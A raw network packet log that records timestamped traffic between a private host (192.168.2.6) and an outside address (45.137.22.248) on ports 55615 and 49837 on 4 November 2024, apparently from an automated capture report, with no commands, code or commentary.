                                                        Nov 4, 2024 04:32:24.451587915 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.451597929 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.451611996 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.451622009 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.451622963 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.451663971 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.451664925 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.451673985 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.451709032 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.451742887 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.451751947 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.451787949 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.451795101 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.451803923 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.451822042 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.451857090 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.451873064 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.451900005 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.451909065 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.451916933 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.451952934 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452069044 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452078104 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452092886 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452105999 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452106953 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452121973 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452147007 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452158928 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452199936 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452222109 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452241898 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452244997 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452255011 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452299118 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452301025 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452311039 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452337027 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452354908 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452362061 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452403069 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452408075 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452452898 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452464104 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452491999 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452531099 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452591896 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452600956 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452609062 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452622890 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452639103 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452656984 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452673912 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452677011 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452686071 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452727079 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452742100 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452752113 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452765942 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452775002 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452795982 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452812910 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452821016 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452856064 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452898026 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452929974 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452939034 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452951908 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.452989101 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.452994108 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453032970 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453042030 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453044891 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453057051 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453077078 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453094006 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453181028 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453190088 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453197002 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453214884 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453223944 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453228951 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453244925 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453263998 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453274012 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453274965 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453321934 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453329086 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453339100 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453357935 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453367949 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453372955 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453413963 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453480005 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453490019 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453497887 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453505993 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453535080 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453552008 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453553915 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453562975 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453593016 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453600883 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453607082 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453609943 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453645945 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453664064 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453672886 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453720093 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453761101 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453769922 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453778982 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453790903 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453802109 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453813076 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453843117 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453851938 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453891039 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453902960 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453912020 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453934908 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453947067 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.453968048 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.453977108 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.454018116 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.454035997 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.454045057 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.454054117 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.454062939 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.454092979 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.454102993 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.454117060 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.454129934 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.454140902 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.454149008 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.454160929 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.454170942 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.454174995 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.454188108 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.454196930 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.454200983 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.454216957 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.454231024 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.454240084 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.454246998 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.454276085 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.454282999 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:24.454283953 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.454293013 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461761951 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461771011 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461780071 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461787939 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461796045 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461806059 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461813927 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461822987 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461867094 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461877108 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461884975 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461894989 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461903095 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461913109 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461920977 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461929083 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461937904 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461946964 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461988926 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.461997032 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462006092 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462014914 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462023973 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462030888 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462045908 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462055922 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462064981 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462074041 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462083101 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462093115 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462145090 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462155104 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462163925 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462174892 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462183952 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462191105 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462201118 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462208986 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462217093 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462225914 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462255955 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462265968 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462274075 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462282896 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462291956 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462301016 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462313890 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462322950 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462331057 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462340117 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462384939 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462393999 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462403059 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462410927 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462419987 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462429047 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462438107 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462446928 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462455034 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462465048 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462506056 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462515116 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462522984 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462532043 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462542057 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462552071 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462560892 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462569952 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462578058 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462587118 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462652922 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462662935 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462671041 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462681055 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462688923 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462698936 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462707043 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462717056 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462724924 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462769032 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462778091 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462785959 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462795019 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462805033 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462814093 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462821007 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462830067 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462837934 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462848902 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462857962 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462867975 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462877035 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462884903 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462893009 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462902069 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462910891 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462919950 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462928057 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.462991953 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.463001013 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.463009119 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.463012934 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.463022947 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.463031054 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.463040113 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.463048935 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.463057041 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:24.504329920 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.678739071 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.690970898 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691361904 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691430092 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691489935 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691541910 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691600084 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691647053 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691690922 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691756010 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691797972 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691859961 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691906929 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.691963911 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.692013979 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.692074060 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.692123890 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.692178011 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.692223072 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.692276955 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.692323923 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.695869923 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696252108 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696309090 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696312904 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696320057 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696330070 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696362019 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696374893 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696381092 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696389914 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696412086 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696420908 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696445942 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696465015 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696475983 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696485043 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696521044 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696526051 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696537971 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696557045 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696578026 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696594954 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696619034 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696629047 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696631908 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696657896 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696666002 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696677923 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696686029 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696711063 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696727037 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696753979 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696762085 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696794033 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696816921 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696830034 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696841002 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696847916 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696851969 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696899891 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696922064 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696932077 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696935892 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696939945 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696960926 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696969032 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.696981907 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.696997881 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697007895 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697019100 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697025061 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697052002 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697061062 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697093964 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697103024 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697144985 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697175980 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697185040 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697228909 CET4983755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:25.697230101 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697238922 CET556154983745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:25.697247982 CET556154983745.137.22.248192.168.2.6
